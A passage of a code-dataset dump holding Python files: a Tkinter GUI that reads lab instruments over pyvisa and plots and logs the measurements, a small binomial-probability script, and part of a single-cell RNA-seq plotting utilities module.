4'))\r\n \r\n dsp.clear()\r\n DSPstr = dsp.query('MP.')\r\n vals = DSPstr.split(\",\")\r\n try:\r\n dspR = float(vals[0])\r\n dspT = float(vals[1])\r\n except ValueError:\r\n dspR = 0.0\r\n dspT = 0.0\r\n \r\n tempA = float(therm.query('INPUT A:TEMPER?'))\r\n \r\n isou.clear()\r\n Inow = isou.query('R0\\r')\r\n istuff = Inow.split(\"R\")\r\n Ival = float(istuff[1])\r\n \r\n retVal = np.asarray([Ival, tempA, srsR, srsT, dspR, dspT], dtype=float)\r\n return retVal\r\n\r\ndef setMax(isou, maxi):\r\n stri = 'I' + str(maxi) + '\\r'\r\n isou.write(stri)\r\n isou.read()\r\n \r\ndef setSign(isou, booli):\r\n if(booli):\r\n isou.write('P1\\r')\r\n isou.read()\r\n else:\r\n isou.write('P2\\r')\r\n isou.read()\r\n time.sleep(.25)\r\n \r\ndef startRamp(isou):\r\n isou.write('A0\\r')\r\n isou.read()\r\n time.sleep(.25)\r\n isou.write('A1\\r')\r\n isou.read()\r\n \r\ndef hold(isou):\r\n isou.write('A0\\r')\r\n isou.read()\r\n \r\nrm = pyvisa.ResourceManager()\r\nprint(rm.list_resources())\r\nsrs, dsp, therm, isou= openDev(rm)\r\n\r\ndef recent():\r\n global rec\r\n global pltSec\r\n rec = True\r\n pltSec = False\r\n\r\ndef sec():\r\n global rec\r\n global pltSec\r\n pltSec = True\r\n rec = False\r\n \r\ndef base(): \r\n global rec\r\n global pltSec\r\n rec = False\r\n pltSec = False\r\n\r\ndef plot():\r\n global output, fig\r\n clear_plot()\r\n \r\n fig = Figure(figsize = (w/100, h/100), dpi = 100)\r\n # adding the subplot \r\n plot1 = fig.add_subplot(2,3,1) \r\n plot2 = fig.add_subplot(2,3,2) \r\n plot3 = fig.add_subplot(2,3,3) \r\n plot4 = fig.add_subplot(2,3,4)\r\n plot5 = fig.add_subplot(2,3,5) \r\n plot6 = fig.add_subplot(2,3,6) \r\n\r\n # plotting the graph \r\n plot1.plot(x, y1, '-') \r\n plot2.plot(x, y2, '-') \r\n plot3.plot(x, y3, '-') \r\n plot4.plot(x, y4, '-') \r\n plot5.plot(x, y5, '-') \r\n plot6.plot(x, y6, '-')\r\n \r\n plot1.set_title('I')\r\n plot2.set_title('Temp')\r\n plot3.set_title('R SRS')\r\n plot4.set_title('Theta SRS')\r\n plot5.set_title('R DSP')\r\n plot6.set_title('Theta DSP')\r\n \r\n output = FigureCanvasTkAgg(fig, master = canvas)\r\n output.draw()\r\n\r\n # placing the canvas on the Tkinter window \r\n output.get_tk_widget().pack()\r\n \r\ndef plotR():\r\n global output, fig\r\n clear_plot()\r\n \r\n vals = e1.get()\r\n try:\r\n val = int(vals)\r\n except ValueError:\r\n val = 0\r\n \r\n fig = Figure(figsize = (w/100, h/100), dpi = 100)\r\n # adding the subplot \r\n plot1 = fig.add_subplot(2,3,1) \r\n plot2 = fig.add_subplot(2,3,2) \r\n plot3 = fig.add_subplot(2,3,3) \r\n plot4 = fig.add_subplot(2,3,4)\r\n plot5 = fig.add_subplot(2,3,5) \r\n plot6 = fig.add_subplot(2,3,6) \r\n \r\n \r\n # plotting the graph\r\n PlotPart = True\r\n if(math.isnan(val)):\r\n PlotPart = False\r\n else:\r\n if(val < 2):\r\n PlotPart = False\r\n if(val > len(x)):\r\n PlotPart = False\r\n \r\n if(not PlotPart):\r\n plot1.plot(x, y1, '-') \r\n plot2.plot(x, y2, '-') \r\n plot3.plot(x, y3, '-') \r\n plot4.plot(x, y4, '-') \r\n plot5.plot(x, y5, '-') \r\n plot6.plot(x, y6, '-')\r\n lab.config(text = 'Invalid Bound, Plotting All')\r\n \r\n else:\r\n plot1.plot(x[-val:], y1[-val:], '-') \r\n plot2.plot(x[-val:], y2[-val:], '-') \r\n plot3.plot(x[-val:], y3[-val:], '-') \r\n plot4.plot(x[-val:], y4[-val:], '-') \r\n plot5.plot(x[-val:], y5[-val:], '-') \r\n plot6.plot(x[-val:], y6[-val:], '-')\r\n lab.config(text = 'Plotting Recent ' + str(val))\r\n \r\n plot1.set_title('I')\r\n plot2.set_title('Temp')\r\n plot3.set_title('R SRS')\r\n plot4.set_title('Theta SRS')\r\n plot5.set_title('R DSP')\r\n 
plot6.set_title('Theta DSP')\r\n \r\n output = FigureCanvasTkAgg(fig, master = canvas)\r\n output.draw()\r\n\r\n # placing the canvas on the Tkinter window \r\n output.get_tk_widget().pack()\r\n\r\ndef plotSec():\r\n global output, fig\r\n clear_plot()\r\n \r\n valL = e2.get()\r\n valR = e3.get()\r\n try:\r\n left = int(valL)\r\n except ValueError:\r\n left = 0\r\n \r\n try:\r\n right = int(valR)\r\n except ValueError:\r\n right = len(x)\r\n \r\n fig = Figure(figsize = (w/100, h/100), dpi = 100)\r\n # adding the subplot \r\n plot1 = fig.add_subplot(2,3,1) \r\n plot2 = fig.add_subplot(2,3,2) \r\n plot3 = fig.add_subplot(2,3,3) \r\n plot4 = fig.add_subplot(2,3,4)\r\n plot5 = fig.add_subplot(2,3,5) \r\n plot6 = fig.add_subplot(2,3,6) \r\n \r\n \r\n # plotting the graph\r\n PlotPart = True\r\n if(math.isnan(left) or math.isnan(right)):\r\n PlotPart = False\r\n else:\r\n if(left < 2 or right < 2):\r\n PlotPart = False\r\n if(left > len(x)):\r\n PlotPart = False\r\n if(right > len(x)):\r\n right = len(x)\r\n if(right - left < 2):\r\n PlotPart = False\r\n \r\n \r\n if(not PlotPart):\r\n plot1.plot(x, y1, '-') \r\n plot2.plot(x, y2, '-') \r\n plot3.plot(x, y3, '-') \r\n plot4.plot(x, y4, '-') \r\n plot5.plot(x, y5, '-') \r\n plot6.plot(x, y6, '-')\r\n lab.config(text = 'Invalid Bounds, Plotting All')\r\n \r\n else:\r\n plot1.plot(x[left:right], y1[left:right], '-') \r\n plot2.plot(x[left:right], y2[left:right], '-') \r\n plot3.plot(x[left:right], y3[left:right], '-') \r\n plot4.plot(x[left:right], y4[left:right], '-') \r\n plot5.plot(x[left:right], y5[left:right], '-') \r\n plot6.plot(x[left:right], y6[left:right], '-')\r\n lab.config(text = 'Plotting Section ' + str(left) + ' to ' + str(right))\r\n \r\n plot1.set_title('I')\r\n plot2.set_title('Temp')\r\n plot3.set_title('R SRS')\r\n plot4.set_title('Theta SRS')\r\n plot5.set_title('R DSP')\r\n plot6.set_title('Theta DSP')\r\n \r\n output = FigureCanvasTkAgg(fig, master = canvas)\r\n output.draw()\r\n\r\n # placing the canvas on the Tkinter window \r\n output.get_tk_widget().pack()\r\n\r\ndef clear_plot():\r\n global output\r\n if output:\r\n for child in canvas.winfo_children():\r\n child.destroy()\r\n # or just use canvas.winfo_children()[0].destroy() \r\n \r\n output = None\r\n \r\ndef get_data(index):\r\n global booli\r\n global Iset\r\n loops = 5\r\n x.append(index)\r\n ret = getData(srs, dsp, therm, isou)\r\n y1.append(ret[0])\r\n y2.append(ret[1])\r\n y3.append(ret[2])\r\n y4.append(ret[3])\r\n y5.append(ret[4])\r\n y6.append(ret[5])\r\n \r\n if(np.abs(ret[0]) == Iset):\r\n booli = not booli\r\n setSign(isou, booli)\r\n startRamp(isou)\r\n \r\n file = open(filename,\"a\")\r\n file.writelines(str(index) + ' ')\r\n for dat in ret:\r\n file.writelines(str(dat) + ' ')\r\n file.write(\"\\n\")\r\n file.close()\r\n \r\n if(index % loops == 0):\r\n if(rec == False and pltSec == False):\r\n plot()\r\n lab.config(text = 'Plotting All')\r\n if(rec == True and pltSec == False):\r\n plotR()\r\n if(pltSec == True):\r\n plotSec()\r\n window.after(1000, get_data, index + 1)\r\n \r\n\r\n# the main Tkinter window \r\nwindow = Tk() \r\n\r\noutput = None\r\nfig = None\r\n\r\nx = []\r\ny1 = []\r\ny2 = []\r\ny3 = []\r\ny4 = [] \r\ny5 = []\r\ny6 = []\r\n# setting the title \r\nwindow.title('Plotting in Tkinter') \r\n\r\n# dimensions of the main window \r\nwindow.geometry(\"1800x800\") \r\n\r\nw = 1750\r\nh = 750\r\n\r\ncanvas = Canvas(window, width=w, height=h, bg='white') \r\ncanvas.pack()\r\n\r\nmyFont = font.Font(family='Helvetica', size=20, 
weight='bold')\r\noutFont = font.Font(family='Helvetica', size=20, weight='bold')\r\n\r\nBB = Button(window, text=\"Plot All\", command=base, bg='green', fg='white')\r\nBB['font'] = myFont\r\nBB.pack(side = LEFT)\r\n\r\nmyButton = Button(window, text=\"Plot Recent\", command=recent, bg='yellow')\r\nmyButton['font'] = myFont\r\nmyButton.pack(side = LEFT)\r\n\r\ne1 = Entry(window, width=10)\r\ne1['font'] = outFont\r\ne1.pack(side = LEFT)\r\n\r\nBut2 = Button(window, text=\"Plot From Index A to B\", command=sec, bg='yellow')\r\nBut2['font'] = myFont\r\nBut2.pack(side = LEFT)\r\n\r\ne2 = Entry(window, width=10)\r\ne2['font'] = outFont\r\ne2.pack(side = LEFT)\r\n\r\ne3 = Entry(window, width=10)\r\ne3['font'] = outFont\r\ne3.pack(side = LEFT)\r\n\r\nlab = Label(window, text='Plotting All', bg = 'light blue')\r\nlab['font'] = myFont\r\nlab.pack(side=LEFT)\r\n\r\nwindow.after(100, get_data, 0)\r\n\r\n\r\nsetMax(isou, Iset)\r\ntime.sleep(.25)\r\nsetSign(isou, booli)\r\ntime.sleep(.25)\r\nstartRamp(isou)\r\ntime.sleep(.25)\r\n\r\n# run the gui\r\nwindow.mainloop()\r\n\r\nhold(isou)","repo_name":"SamuelMumford/GUIData","sub_path":"DataTakeGUI.py","file_name":"DataTakeGUI.py","file_ext":"py","file_size_in_byte":9497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32422783893","text":"from scipy.special import comb\nimport numpy as np\n\nbottles_of_cola = 10\ntotal = pow(2,bottles_of_cola)\n\ndata = []\nfor i in range(bottles_of_cola+1):\n\tdata.append(comb(bottles_of_cola,i))\npdf = np.around(np.divide(data, total),4)\ncdf = np.around(np.cumsum(pdf),3)\nprint(\"sum: {}, data: {}\".format(sum(data),data))\nprint(\"pdf: {}\".format(pdf))\nprint(\"cdf: {}%\".format(cdf))\n\n\nimport matplotlib.pyplot as plt\n# plt.plot(range(0, len(data)),data)\nplt.plot(range(0, len(data)),pdf)\nplt.plot(range(0, len(data)),cdf)\nplt.show()","repo_name":"lloyd-dong/tiger_class","sub_path":"learn_python/cola_calc.py","file_name":"cola_calc.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70508023208","text":"from cProfile import label\nfrom turtle import color\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport seaborn as sns\nfrom matplotlib import cm\nimport scanpy as sc\n# import utils\nimport numpy as np\nimport matplotlib\nimport os\nimport utils\nimport matplotlib.image as mpimg\n\n'''Plotting functions'''\n\ncond_colors = {\n 'Healthy' : '#440154FF',\n 'HF-A' : '#21908CFF',\n 'HF-CKD' : '#FDE725FF',\n}\n\nctype_colors = {\n 'adipocytes' : '#D51F26',\n 'cardiomyocyte' : '#272E6A',\n 'endothelial' : '#208A42',\n 'fibroblast' : '#89288F',\n 'lymphatic_endo' : '#F47D2B',\n 'macrophages' : '#FEE500',\n 'mast_cells' : '#8A9FD1',\n 'neuronal' : '#C06CAB',\n 'pericyte' : '#D8A767',\n 'T-cells' : '#90D5E4',\n 'vSMCs' : '#89C75F'\n}\n\ndef plot_mt_vs_counts(data, ax, mt_thr=20, fontsize=11): \n # Plot scatter\n ax.scatter(x=data.obs.total_counts, y=data.obs.pct_counts_mt, s=1, c='gray')\n ax.axhline(y=mt_thr, linestyle='--', color=\"black\")\n ax.set_xlabel(\"Total counts\", fontsize=fontsize)\n ax.set_ylabel(\"Fraction MT counts\", fontsize=fontsize)\n\n\ndef plot_rp_vs_counts(data, ax, rp_thr=None, fontsize=11): \n # Plot scatter\n ax.scatter(x=data.obs.total_counts, y=data.obs.pct_counts_rp, s=1, c='gray')\n if rp_thr:\n ax.axhline(y=rp_thr, linestyle='--', color=\"black\")\n 
ax.set_xlabel(\"Total counts\", fontsize=fontsize)\n ax.set_ylabel(\"Fraction RP counts\", fontsize=fontsize)\n\n\ndef plot_ngenes_vs_counts(data, ax, gene_thr=6000, fontsize=11):\n # Plot scatter\n ax.scatter(x=data.obs.total_counts, y=data.obs.n_genes_by_counts, s=1, c='gray')\n ax.axhline(y=gene_thr, linestyle='--', color=\"black\")\n ax.set_xlabel(\"Total counts\", fontsize=fontsize)\n ax.set_ylabel(\"Number of genes expr\", fontsize=fontsize)\n\n\ndef plot_doublet_scores(data, ax, doublet_thr=0.2, fontsize=11):\n # Plot histogram\n ax.hist(data.obs.doublet_score, bins=100, color='gray')\n ax.axvline(x=doublet_thr, linestyle='--', color=\"black\")\n ax.set_xlabel('Droplet score distribution', fontsize=fontsize)\n \n\ndef plot_diss_scores(data, ax, diss_thr=0.5, fontsize=11):\n # Plot histogram\n ax.hist(data.diss_score, bins=100, color='gray')\n ax.axvline(x=diss_thr, linestyle='--', color=\"black\")\n ax.set_xlabel('Dissociation score distribution', fontsize=fontsize)\n\n\ndef plot_ncell_diff(data, ax, labels, n_rem, fontsize=11):\n # Plot Barplot\n for label, n in zip(labels, n_rem):\n ax.bar(label, n)\n ax.set_title('Cells removed per filter', fontsize=fontsize)\n ax.tick_params(axis='x', rotation=45)\n \ndef plot_cell_type_proportion(cond_list, cond_name =\"Immune\", adata=None, obs_col = \"cell_type_0.20\", sample_type=\"sc\"):\n input_path = \"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_integrated_cluster_scannot.h5ad\"\n sample_type=\"sc\"\n adata = sc.read_h5ad(input_path)\n meta = utils.get_meta_data(sample_type)\n condition = list(np.unique(meta['condition']))\n c_type_list = list(adata.obs[obs_col].cat.categories)\n\n # CD-AOM-DSS-Epi_plus_DN,LFD-AOM-DSS-Epi_plus_DN,HFD-AOM-DSS-Epi_plus_DN\n # CD-AOM-DSS-Immune,LFD-AOM-DSS-Immune,HFD-AOM-DSS-Immune\n cond_list = cond_list.split(\",\")\n # cond_list = [\"CD-AOM-DSS-Immune\", \"LFD-AOM-DSS-Immune\", \"HFD-AOM-DSS-Immune\"]\n # cond_list = [\"CD-AOM-DSS-Epi_plus_DN\", \"LFD-AOM-DSS-Epi_plus_DN\", \"HFD-AOM-DSS-Epi_plus_DN\"]\n cond_prop = dict()\n cond_arr = []\n for cond in cond_list:\n cond_arr.append([])\n # print(cond, cond_arr)\n cond_prop[cond] = []\n adata_tmp = adata[adata.obs[\"condition\"]==cond,:]\n # print(adata_tmp.shape)\n sum = 0\n for c_type in c_type_list:\n print(\"c_type\", c_type, adata_tmp[adata_tmp.obs[obs_col]==c_type].shape)\n cond_arr[-1].append(100*(adata_tmp[adata_tmp.obs[obs_col]==c_type].shape[0]/adata_tmp.shape[0]))\n #cond_prop[cond][c_type] = adata_tmp.obs[\"cell_type_0.20\"].str.count(c_type).sum()/adata_tmp.shape[0]\n # cond_prop[cond][c_type] = adata_tmp.obs[\"cell_type_0.20\"].str.count(c_type).sum()/adata_tmp.shape[0]\n #sum += adata_tmp.obs[\"cell_type_0.20\"].str.count(c_type).sum()\n\n data = np.array(cond_arr).T\n\n fig, ax1 = plt.subplots(figsize=(10, 6))\n\n # For loop for creating stacked bar chart\n cmap = matplotlib.cm.get_cmap('tab20')\n\n X = np.arange(data.shape[1])\n for i in range(data.shape[0]):\n ax1.bar(X, data[i],bottom = np.sum(data[:i], \n axis =0), width= 0.85, color = cmap.colors[i], label=c_type_list[i] )\n\n ax1.set_xticks([0,1,2])\n ax1.set_xticklabels(cond_list) # , rotation=45)\n ax1.set_xlabel(\"Condition\", fontweight='bold')\n ax1.set_ylabel(\"Proportion (%)\", fontweight='bold')\n ax1.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n plt.subplots_adjust(bottom=0.45)\n fig.tight_layout()\n plt.savefig(f\"../plots/sc_cell_type_annot/major_cell_type_prop_{cond_name}_barplot.pdf\")\n\n fig, axs = plt.subplots(5, 4, figsize=[15, 15])\n \n 
for ind, c_t in enumerate(c_type_list):\n        fig_row, fig_col = int(ind/4), ind%4\n        axs[fig_row][fig_col].plot(cond_list, data[ind,:], marker='o', mec = 'grey', mfc = 'grey', markersize=12, linewidth=5, color=cmap.colors[ind], label=c_t)\n        axs[fig_row][fig_col].set_title(c_t)\n        axs[fig_row][fig_col].set_xticklabels([\"CD\", \"LFD\", \"HFD\"])\n        axs[fig_row][fig_col].tick_params(axis='y', which='major', labelsize=8)\n\n    \n    plt.subplots_adjust(bottom=0.45)\n    fig.supxlabel('Condition', fontweight='bold')\n    fig.supylabel('Proportion (%)', fontweight='bold')\n    fig.tight_layout()\n    \n    fig.delaxes(axs[4][3])\n    fig.delaxes(axs[4][2])\n    fig.delaxes(axs[4][1])\n    plt.savefig(f\"../plots/sc_cell_type_annot/majorcell_type_prop_{cond_name}_line.pdf\")\n\n\n\n# plot_cell_type_proportion(\"CD-AOM-DSS-Epi_plus_DN,LFD-AOM-DSS-Epi_plus_DN,HFD-AOM-DSS-Epi_plus_DN\", cond_name =\"epithelial\", adata=None, obs_col = \"major_cell_types\", sample_type=\"sc\")\n# plot_cell_type_proportion(\"CD-AOM-DSS-Immune,LFD-AOM-DSS-Immune,HFD-AOM-DSS-Immune\", cond_name =\"immune\", adata=None, obs_col = \"major_cell_types\", sample_type=\"sc\")\n\n\ndef plot_ngene_diff(adata, ax, fontsize=11):\n    ax.set_title('Num genes filtered', fontsize=fontsize)\n    ax.bar(x=\"Before\", height=adata.uns['hvg']['ngene'])\n    ax.bar(x=\"After\", height=adata.shape[1])\n    \n    \ndef plot_hvg_nbatches(data, ax, fontsize=11):\n    for nbatches in np.flip(np.unique(data.highly_variable_nbatches)):\n        num = data[data.highly_variable_nbatches == nbatches].shape[0]\n        ax.bar(str(nbatches), num, color=\"gray\")\n    ax.set_title('Num shared HVG by num samples',fontsize=fontsize)\n    \n    \ndef plot_sorted_rank(data, col, ax, fontsize=11):\n    xdim = np.arange(len(data))\n    ysort = np.flip(np.sort(data[col]))\n    ax.set_title('Ranked {0}'.format(col), fontsize=fontsize)\n    ax.plot(xdim, ysort, c='grey')\n\n    \ndef stacked_barplot(data, feature_name, ax, cmap=cm.tab20):\n    # cell type names\n    type_names = data.var.index\n    levels = pd.unique(data.obs[feature_name])\n    n_levels = len(levels)\n    feature_totals = np.zeros([n_levels, data.X.shape[1]])\n\n    for level in range(n_levels):\n        l_indices = np.where(data.obs[feature_name] == levels[level])\n        feature_totals[level] = np.sum(data.X[l_indices], axis=0)\n    \n    y = feature_totals\n    title=feature_name\n    level_names=levels\n    \n    n_bars, n_types = y.shape\n    r = np.array(range(n_bars))\n    sample_sums = np.sum(y, axis=1)\n\n    barwidth = 0.85\n    cum_bars = np.zeros(n_bars)\n\n    for n in range(n_types):\n        bars = [i / j * 100 for i, j in zip([y[k][n] for k in range(n_bars)], sample_sums)]\n        ax.bar(r, bars, bottom=cum_bars, color=cmap(n % cmap.N), width=barwidth, label=type_names[n], linewidth=0)\n        cum_bars += bars\n    ax.set_title(title)\n    ax.legend(loc='upper left', bbox_to_anchor=(1, 1), ncol=1)\n    ax.set_xticks(r)\n    ax.set_xticklabels(level_names, rotation=45)\n    ax.set_ylabel(\"Proportion\")\n\ndef volcano(name, lfc, pvals, ax, max_num=None,\n            lfc_thr=0.5, p_thr=0.05, s=10, fontsize=12):\n    '''Volcano plot from a list of lfc and untransformed pvalues'''\n\n    if max_num is None:\n        max_num=np.max(np.abs(lfc))\n    \n    # Transform pvals\n    pvals = -np.log10(pvals)\n    \n    # Mask significant genes\n    msk = (pvals > -np.log10(p_thr)) & (np.abs(lfc) > lfc_thr)\n    \n    # Plot scatter\n    ax.set_title(name)\n    ax.scatter(lfc[~msk], pvals[~msk], c='gray', s=s)\n    ax.scatter(lfc[msk], pvals[msk], c='red', s=s)\n    ax.set_xlim(-max_num, max_num)\n    ax.set_xlabel('LogFC', fontsize=fontsize)\n    ax.set_ylabel('-log10(pvalue)', fontsize=fontsize)\n    ax.set_box_aspect(1)\n    \ndef 
dotplot(title, x, y, c, s, size_title, color_title, cmap='coolwarm', edgecolor=None, num=30, fontsize=9, figsize=(12,6)):\n # Define figure\n fig, ax = plt.subplots(1,1, dpi=150, figsize=figsize)\n ax.set_title(title, fontsize=fontsize+5)\n \n # Add grid and set it to background\n ax.grid(True)\n ax.set_axisbelow(True)\n \n # Dot plot\n max_num = np.max(np.abs(c))\n scatter = ax.scatter(\n x=x,\n y=y,\n c=c,\n s=s * num,\n cmap=cmap,\n vmax=max_num,\n vmin=-max_num,\n edgecolor=edgecolor\n )\n \n # Format dot plot ticks\n ax.tick_params(axis='x', rotation=90, labelsize=fontsize)\n ax.tick_params(axis='y', labelsize=fontsize)\n ax.margins(y=0.05)\n\n # Plot pvalue dot sizes legend\n handles, labels = scatter.legend_elements(\"sizes\", num=4)\n labels = ['$\\\\mathdefault{'+'{0}'.format(int(int(label.split('{')[1].split('}')[0])/num))+'}$' for label in labels]\n\n ax.legend(handles, labels, loc=\"upper left\", bbox_to_anchor=(1,1), frameon=False, title=size_title)\n \n # Add color bar\n cax = fig.add_axes([0.945, 0.25, 0.025, 0.35])\n cbar = fig.colorbar(scatter, cax=cax, orientation='vertical')\n cbar.ax.set_title(color_title)\n \n # Format figure\n fig.tight_layout()\n fig.set_facecolor('white')\n \n return fig\n\ndef plot_ora(name, df, ax, top=10, fontsize=11):\n df = df.sort_values('adj_pvalues', ascending=True).head(top)\n names = np.flip(df['descr'].tolist())\n pvals = np.flip(-np.log10(df['adj_pvalues']))\n ax.barh(names, pvals, color='gray')\n ax.axvline(x=-np.log10(0.05), c='black', ls='--')\n ax.set_xlabel('-log10(adj_pval)', fontsize=fontsize)\n ax.set_title(name, fontsize=fontsize)\n \ndef corr(name, x, y, ax, fontsize=11):\n from scipy import stats\n corr, _ = stats.spearmanr(x, y)\n ax.scatter(x, y, c='gray', s=5)\n ax.set_title('{0} | corr: {1}'.format(name, '{:.2f}'.format(corr)), fontsize=fontsize)\n \ndef violins(arr, meta, ax):\n data = arr.copy()\n data[data==0] = np.nan\n sns.violinplot(x=data.melt().variable, \n y=np.log2(data.melt().value), \n hue=meta.loc[data.melt().variable].condition.values)\n\n\n# def plot_qc_after_filtering(sample_type):\ndef show_plot(plt_path, text=None):\n img = mpimg.imread(plt_path)\n plt.imshow(img)\n\ndef show_qc_filtering_plot(plot_fold_path, sample_type):\n meta = utils.get_meta_data(sample_type)\n\n for _, row in meta.iterrows():\n sample_id = row[\"sample_id\"]\n\n print(\"QC metrics...\")\n show_plot(os.path.join(plot_fold_path, f\"{sample_type}_qc_preprocess\", f\"basic_stats_before_filtering_{sample_id}.pdf\"))\n print(\"Plotting highest expressed genes after QC and filtering...\")\n show_plot(os.path.join(plot_fold_path, f\"{sample_type}_qc_preprocess\", f\"highest_expr_genesbasic_stats_after_filtering_{sample_id}.pdf\"))\n\ndef plot_clusters(adata):\n plt.rcParams['figure.dpi']= 300\n plt.rcParams['figure.figsize']= (45, 30)\n for cat_n in adata.obs['leiden_0.40'].cat.categories:\n cat_n = int(cat_n)\n adata.obs['cluster_dummy'] = adata.obs['leiden_0.40'] == adata.obs['leiden_0.40'].cat.categories[cat_n]\n adata.obs[\"cluster_dummy\"] = adata.obs['cluster_dummy'].astype(str).astype('category')\n sc.pl.umap(adata, color='cluster_dummy', size=10, title=f\"Cluster {cat_n}\", save=f\"atlas_cluster_{cat_n}\")\n\n\"\"\" adata.obs['cluster_dummy'] = adata.obs['leiden_0.40'] == adata.obs['leiden_0.40'].cat.categories[1]\n adata.obs[\"cluster_dummy\"] = adata.obs['cluster_dummy'].astype(str).astype('category')\n sc.pl.umap(adata, color='cluster_dummy', size=10, title=\"Cluster 0\", save=f\"atlas_cluster_1\")\"\"\"\n\n\n# the functions for 
adding stat. sig. plots are coming from here\n# https://stackoverflow.com/questions/11517986/indicating-the-statistically-significant-difference-in-bar-graph\n\n\n# This plotting function comes from the answer in the following link\n# https://stackoverflow.com/questions/11517986/indicating-the-statistically-significant-difference-in-bar-graph\ndef barplot_annotate_brackets(num1, num2, data, center, height, yerr=None, dh=.05, barh=.05, fs=None, maxasterix=None):\n    \"\"\" \n    Annotate barplot with p-values.\n\n    :param num1: number of left bar to put bracket over\n    :param num2: number of right bar to put bracket over\n    :param data: string to write or number for generating asterisks\n    :param center: centers of all bars (like plt.bar() input)\n    :param height: heights of all bars (like plt.bar() input)\n    :param yerr: yerrs of all bars (like plt.bar() input)\n    :param dh: height offset over bar / bar + yerr in axes coordinates (0 to 1)\n    :param barh: bar height in axes coordinates (0 to 1)\n    :param fs: font size\n    :param maxasterix: maximum number of asterisks to write (for very small p-values)\n    \"\"\"\n\n    if type(data) is str:\n        text = data\n    else:\n        # * is p < 0.05\n        # ** is p < 0.005\n        # *** is p < 0.0005\n        # etc.\n        text = ''\n        p = .05\n\n        while data < p:\n            text += '*'\n            p /= 10.\n\n            if maxasterix and len(text) == maxasterix:\n                break\n\n        if len(text) == 0:\n            text = 'n. s.'\n\n    lx, ly = center[num1], height[num1]\n    rx, ry = center[num2], height[num2]\n\n    if yerr:\n        ly += yerr[num1]\n        ry += yerr[num2]\n\n    ax_y0, ax_y1 = plt.gca().get_ylim()\n    dh *= (ax_y1 - ax_y0)\n    barh *= (ax_y1 - ax_y0)\n\n    y = max(ly, ry) + dh\n\n    barx = [lx, lx, rx, rx]\n    bary = [y, y+barh, y+barh, y]\n    mid = ((lx+rx)/2, y+barh)\n\n    plt.plot(barx, bary, c='black')\n\n    kwargs = dict(ha='center', va='bottom')\n    if fs is not None:\n        kwargs['fontsize'] = fs\n\n    plt.text(*mid, text, **kwargs)\n\n\ndef test_significance():\n    heights = [1.8, 2, 3]\n    bars = np.arange(len(heights))\n\n    plt.figure()\n    plt.bar(bars, heights, align='center')\n    plt.ylim(0, 5)\n    barplot_annotate_brackets(0, 1, .1, bars, heights)\n    barplot_annotate_brackets(1, 2, .001, bars, heights)\n    barplot_annotate_brackets(0, 2, 'p < 0.0075', bars, heights, dh=.2)\n    plt.savefig(\"test_sig.pdf\")\n\n\n\n\n# Custom function to draw the diff bars\n\ndef label_diff(i,j,text,X,Y, ax):\n    x = (X[i]+X[j])/2\n    print(Y[i], Y[j])\n\n    y = max(Y[i], Y[j])\n    \n    print(y)\n    dx = abs(X[i]-X[j])\n\n    props = {'connectionstyle':'bar','arrowstyle':'-',\\\n             'shrinkA':5,'shrinkB':5,'linewidth':2}\n\n    ax.annotate(text, xy=(x,y), zorder=10, ha='center', fontsize=15)\n    ax.annotate('', xy=(X[i],y), xytext=(X[j],y), arrowprops=props)\n    \n\n\n\ndef plot_significance(first_label, second_label, third_label, first_prop, second_prop, third_prop, first_second_p_val, second_third_p_val, first_third_pval, c_type, fl_name):\n    proportions = (first_prop, second_prop, third_prop)\n    # print(proportions, max(proportions))\n    ind = np.arange(3)    # the x locations for the groups\n    width= 0.7\n    labels = (first_label, second_label, third_label)\n\n    # Pull the formatting out here\n    bar_kwargs = {'width':width,'color':'y','linewidth':2,'zorder':5}\n    err_kwargs = {'zorder':0,'fmt':None,'linewidth':2,'ecolor':'k'}  #for matplotlib >= v1.4 use 'fmt':'none' instead\n    plt.rcParams['figure.dpi']= 300\n    plt.rcParams['figure.figsize']= (15, 10)\n\n    fig, ax = plt.subplots()\n    ax.p1 = plt.bar(ind, proportions, **bar_kwargs)\n    # ax.errs = plt.errorbar(ind, menMeans, yerr=menStd, **err_kwargs)\n    # Call the function\n    
label_diff(0,1,f'{first_second_p_val}',ind,proportions, ax)\n label_diff(1,2,f'{second_third_p_val}',ind,proportions, ax)\n label_diff(0,2,f'{first_third_pval}',ind,proportions, ax)\n # ax.set_ylim(max(proportions)+ max(proportions)*0.20)\n\n ax.set_ylim([0.0, (max(proportions)+ max(proportions)*0.30)])\n ax.set_title(f'Cell Type Proportion: {c_type}')\n ax.set_xlabel('Condition', fontsize=20)\n ax.set_ylabel('Proportion (%)', fontsize=20)\n ax.spines[['right', 'top']].set_visible(False)\n\n\n\n \n plt.xticks(ind, labels, color='k')\n plt.savefig(f\"../plots/sc_cell_type_prop/{fl_name}_{c_type}.pdf\")\n plt.savefig(f\"../plots/sc_cell_type_prop/{fl_name}_{c_type}.png\")\n\n\ndef deg_venn_diagram(sign_thr=0.05, lFCs_thr=0.5, topn=50):\n from matplotlib_venn import venn3\n\n df_hfd_vs_cd = pd.read_csv(\"../data/analysis/condition_HFD-AOM-DSS-Immune_vs_CD-AOM-DSS-Immune_deg.csv\")\n df_lfd_vs_cd = pd.read_csv(\"../data/analysis/condition_LFD-AOM-DSS-Immune_vs_CD-AOM-DSS-Immune_deg.csv\")\n df_lfd_vs_hfd = pd.read_csv(\"../data/analysis/condition_LFD-AOM-DSS-Immune_vs_HFD-AOM-DSS-Immune_deg.csv\")\n\n\n \"\"\"df_hfd_vs_cd = pd.read_csv(\"../data/analysis/condition_HFD-AOM-DSS-Immune_vs_CD-AOM-DSS-Immune_before_shrink_deg.csv\")\n df_lfd_vs_cd = pd.read_csv(\"../data/analysis/condition_LFD-AOM-DSS-Immune_vs_CD-AOM-DSS-Immune_before_shrink_deg.csv\")\n df_lfd_vs_hfd = pd.read_csv(\"../data/analysis/condition_LFD-AOM-DSS-Immune_vs_HFD-AOM-DSS-Immune_before_shrink_deg.csv\")\"\"\"\n\n df_hfd_vs_cd_mask_upreg = (df_hfd_vs_cd['log2FoldChange'] >= lFCs_thr) & (df_hfd_vs_cd['padj'] <= sign_thr)\n df_hfd_vs_cd_mask_downreg = 